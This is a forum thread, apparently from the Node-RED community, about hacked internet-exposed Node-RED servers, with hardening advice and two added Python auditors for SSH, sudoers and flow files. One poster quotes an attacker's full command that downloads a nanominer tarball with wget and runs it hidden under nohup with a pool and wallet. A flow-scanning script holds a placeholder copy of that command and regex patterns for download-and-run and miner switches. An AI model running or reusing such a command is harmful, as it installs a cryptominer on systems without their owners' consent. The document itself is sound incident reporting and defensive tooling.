Dashboard suddenly asks for password (Hacked Node-RED servers)

They are good for people with limited experience of security and networking but who need remote access to their environment.

I use something on my own service too. The difference being that I leave it turned off normally and only turn it on when I (rarely) need it.

Which is good for those people who have the knowledge and the time to set it up properly. The cloud services provide generally strong security (with the two caveats of (a) trusting the vendor and (b) making sure that remote devices and networking are not compromised).

And that is an important point. You don't need to expose a web endpoint if all you need is a simple switch or two and some simple data responses.

You think you SOLVED a problem with that?! When this thread is all about preventing cyber attacks on Node-RED systems?!!!!! :frowning: You are doing the opposite.

I'm not actually convinced that those attackers got in via SSH, there are easier attacks if you have the tools. But the reason for moving the port is to stop simple port scans. The automated scans that start a few seconds after you expose a device to the Internet. Moving to a non-standard port stops the majority of those and when I last tried, it killed off 99%+ of all SSH attacks on my systems (a couple of VPSs, so they were always going to be Internet facing).

I agree with the comment that it is best not to expose SSH at all if you can help it. Indeed, the best security is no exposure at all :smiley: Just not terribly practical sometimes.

Haha, even I won't do that! :wink:

I refer everyone back to the FAQ thread on security that I referenced earlier.

If you really think you need to expose a web endpoint, you have to accept there are risks and you need to prepare for them. Preparing isn't necessarily that hard but it is detailed work that you need to do carefully step by step. If you are not prepared to take the time or don't have the time, please do us all a favour - don't expose to the internet. Cyber failures don't just impact you, successful attacks often lead to systems being used to attack others.

Security starts by not making assumptions. For example, if you are using a Raspberry Pi, you probably just launch straight in and use the Pi user and group and maybe do the passwordless sudo thing that I objected to above - sure, we all do that! But once you start considering other people accessing your system, you would be better off creating a new install and making it secure from scratch - well before even starting to layer the additional services and node-red configuration changes required.

It is also a reasonable (not terrible) amount of ongoing work to keep a system secure. Again, if you aren't prepared to do that, don't even start please. You need to be regularly updating all of your software and keeping an eye out for improvements you need to make such as better logging and alerting. I tend to use an auto-update service on Linux devices so I don't have to think about updates too much. That might break things occasionally but better than being exposed unknowingly by out-of-date software.
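Two of the points made above (don't leave SSH on its default port with password logins, and don't keep passwordless sudo once other people can reach the box) can be checked mechanically. The following is an added example, not code from the thread or from the Node-RED project: it parses an sshd_config body and a sudoers fragment and reports the weak settings, with a constructed weak configuration beside a hardened one. The defaults assumed for absent sshd keywords (port 22, password authentication on, root login limited to keys) are OpenSSH's own defaults as I know them; the sample texts are constructed, not copied from any real host.

```python
import re

# Constructed sample inputs (not from any real host). The sshd_config leaves the
# port and root-login lines commented out, so the built-in defaults apply; the
# sudoers fragment is the shape Raspberry Pi OS ships for the "pi" user.
SAMPLE_SSHD_CONFIG = """\
# Example sshd_config (constructed)
#Port 22
#PermitRootLogin prohibit-password
PasswordAuthentication yes
ChallengeResponseAuthentication no
X11Forwarding yes
"""

HARDENED_SSHD_CONFIG = """\
# Hardened counterpart (constructed)
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""

SAMPLE_SUDOERS = """\
# Constructed sudoers.d fragment
pi ALL=(ALL) NOPASSWD: ALL
%admin ALL=(ALL) ALL
"""

# Values sshd applies when a keyword is absent (assumed OpenSSH defaults).
SSHD_DEFAULTS = {
    "port": "22",
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}


def parse_sshd_config(text):
    """Return the effective keyword -> value map (keywords lower-cased).

    sshd honours the first occurrence of a keyword and ignores later duplicates,
    and a commented-out line leaves the default in force, so both are mirrored.
    """
    effective = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2 and parts[0].lower() not in effective:
            effective[parts[0].lower()] = parts[1].strip()
    return effective


def audit_sshd_config(text):
    """List the settings a defender would want changed before exposing SSH."""
    cfg = parse_sshd_config(text)

    def setting(key):
        return cfg.get(key, SSHD_DEFAULTS[key]).lower()

    issues = []
    if setting("port") == "22":
        issues.append("sshd listens on the default port 22 (the one automated scans hit first)")
    if setting("passwordauthentication") != "no":
        issues.append("password authentication is enabled; allow keys only")
    if setting("permitrootlogin") == "yes":
        issues.append("root may log in directly with a password")
    return issues


def audit_sudoers(text):
    """Report every rule that grants sudo without a password."""
    issues = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rule = line.split("#", 1)[0].strip()   # drop trailing comments
        if "NOPASSWD" in rule:
            issues.append(f"line {lineno}: passwordless sudo rule: {rule}")
    return issues


if __name__ == "__main__":
    for label, body in (("weak", SAMPLE_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(f"sshd_config ({label}):", audit_sshd_config(body) or "no issues")
    print("sudoers:", audit_sudoers(SAMPLE_SUDOERS) or "no issues")
```

Run against the real files (`/etc/ssh/sshd_config`, `/etc/sudoers` and the fragments under `/etc/sudoers.d/`) by reading them in place of the constructed samples; the parser deliberately does not follow `Include` or `Match` blocks, so a config that uses those needs the included files checked the same way.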


You're right, on my side they downloaded an ip2.sh script and ran it. I think it is a test of how powerful the machine is, even the wallet is visible here:

mkdir -p /tmp/run/1/101/23/65/36 &&cd /tmp/run/1/101/23/65/36 && rm -rf nanominer-linux-3.6.8.tar.gz&& wget http://xx.xx.xx.xxx:26/nanominer-linux-3.6.8.tar.gz && tar xzvf nanominer-linux-3.6.8.tar.gz && cd nanominer-linux-3.6.8 && mv nanominer python&& nohup ./python -algo verushash -pool1 dg4.dnslook.ga:3300 -wallet TL8914yZncYAriHHgaak6w8pNy4dRf8T88.$(echo $(wget -q -O - ifconfig.me)|sed -e 's/\.//g') -password c=TRX >/dev/null 2>&1 &

I even saw a small peak here, but not for a long time, so it was a test imho:

But if they run the commands through NR, how come they appear in my local command history?

That's a good question. I don't think commands run via the exec node are recorded in .bash_history.
One person posted above that a Terminal link was added to their Node-red dropdown menu.

My only reason to assume it was related to cryptomining is the name "nanominer" but the name may well be intended to deceive. We know that other binary files were downloaded too.
So the spike in activity might just be while your Pi was set up as part of their bot net and it's then passively waiting for further instructions.
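Since the exec node is the likely way those commands were run, the flow file is where to look for them. The following is an added example, not code from the thread or from the Node-RED project: it reads a flows.json array, picks out every exec node, and flags commands that match the download-and-run pattern quoted above (fetch to /tmp, rename the binary, run it under nohup, mining pool and wallet switches), plus any exec node wired to an inject node set to fire at deploy, which is how such a command would survive a restart. The field names used (`command` and `append` on exec nodes, `once` and `wires` on inject nodes) are my understanding of the flow file format; the sample flow is constructed, with the attacker's host, pool and wallet replaced by placeholders.

```python
import json
import re

# Constructed flows.json excerpt (not from any real deployment). Node n2 mirrors
# the one-liner quoted earlier in the thread with placeholders for the host,
# pool and wallet; n3 is an ordinary, legitimate exec node for contrast.
SAMPLE_FLOWS_JSON = """
[
  {"id": "tab1", "type": "tab", "label": "Flow 1"},
  {"id": "n1", "type": "inject", "z": "tab1", "name": "", "once": true,
   "onceDelay": 0.1, "wires": [["n2"]]},
  {"id": "n2", "type": "exec", "z": "tab1", "name": "",
   "command": "mkdir -p /tmp/run/x && cd /tmp/run/x && wget http://ATTACKER-HOST-PLACEHOLDER:26/payload.tar.gz && tar xzvf payload.tar.gz && mv nanominer python && nohup ./python -algo verushash -pool1 POOL-PLACEHOLDER:3300 -wallet WALLET-PLACEHOLDER >/dev/null 2>&1 &",
   "append": "", "wires": [[], [], []]},
  {"id": "n3", "type": "exec", "z": "tab1", "name": "read temp",
   "command": "vcgencmd measure_temp", "append": "", "wires": [[], [], []]},
  {"id": "n4", "type": "debug", "z": "tab1", "name": "", "wires": []}
]
"""
SAMPLE_FLOWS = json.loads(SAMPLE_FLOWS_JSON)

# Indicators drawn from the pattern seen in the thread plus common variants of it.
SUSPICIOUS_PATTERNS = {
    "remote_download": re.compile(r"\b(wget|curl)\b.*\bhttps?://", re.I),
    "writes_to_tmp": re.compile(r"(/tmp/|/dev/shm/|/var/tmp/)"),
    "background_exec": re.compile(r"\bnohup\b|&\s*$"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b"),
    "miner_terms": re.compile(r"-pool\d*\b|-wallet\b|-algo\b|stratum\+tcp|miner", re.I),
    "binary_rename": re.compile(r"\bmv\s+\S+\s+(python|sshd|kworker)\b"),
}


def nodes_triggered_at_deploy(flows):
    """Ids of nodes wired directly from an inject node with 'once' set."""
    targets = set()
    for node in flows:
        if node.get("type") == "inject" and node.get("once"):
            for port in node.get("wires", []):
                targets.update(port)
    return targets


def audit_flows(flows):
    """Return one finding per exec node whose command matches an indicator."""
    auto_start = nodes_triggered_at_deploy(flows)
    findings = []
    for node in flows:
        if node.get("type") != "exec":
            continue
        # The effective command line is the command plus any appended arguments.
        cmd = " ".join(p for p in (node.get("command", ""), node.get("append", "")) if p)
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        if node.get("id") in auto_start and hits:
            hits.append("auto_triggered_at_deploy")
        if hits:
            findings.append({
                "id": node.get("id"),
                "name": node.get("name") or "(unnamed)",
                "tab": node.get("z"),
                "indicators": hits,
                "command": cmd,
            })
    return findings


if __name__ == "__main__":
    # To check a real install, replace SAMPLE_FLOWS with
    # json.load(open("~/.node-red/flows.json")) (path expanded as appropriate).
    print(json.dumps(audit_flows(SAMPLE_FLOWS), indent=2))
```

A finding is a prompt to look, not proof of compromise: a legitimate flow can download and background a process too. What makes n2 stand out is the combination of indicators and the fact that it is unnamed and fires at deploy, so after a suspected break-in it is worth diffing the flow file against a known-good backup as well as running this check.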

Just to add my little contribution, I have quite a few services running Node-RED, Homeassistant, etc. all unprotected within the LAN, BUT:

The only way to get to them is through Softether VPN (quite easy to install) running on my Pi with port 5555 open on the router.

  • Identification from my laptop is done with the Softether client (no password, but PKI certificate).

  • Identification from my phone is done through OpenVPN also with a different PKI certificate. Softether makes it easy to export an OpenVPN profile for your phone.

I know it is therefore not easy to give access to friends or family but I find it a quite secure setup (in which case you are trusting the Softether software, for good or bad).

You can set up your own VPN server behind the firewall or NAT in your company, and you can reach that VPN server in the corporate private network from your home or mobile place, without any modification of firewall settings. Deep-packet inspection firewalls cannot detect SoftEther VPN's transport packets as a VPN tunnel, because SoftEther VPN uses Ethernet over HTTPS for camouflage.

OMG! I can't believe they are effectively encouraging people to set up an uncontrolled entry point into corporate networks! If anyone tried that in any organisation I've ever worked with, they would be instantly sacked.


I don't understand. How do you imply I suggested such a terrible action? Or is it in the Softether website?

... it's from the softether.org website


Sorry, my bad for not writing that more clearly.
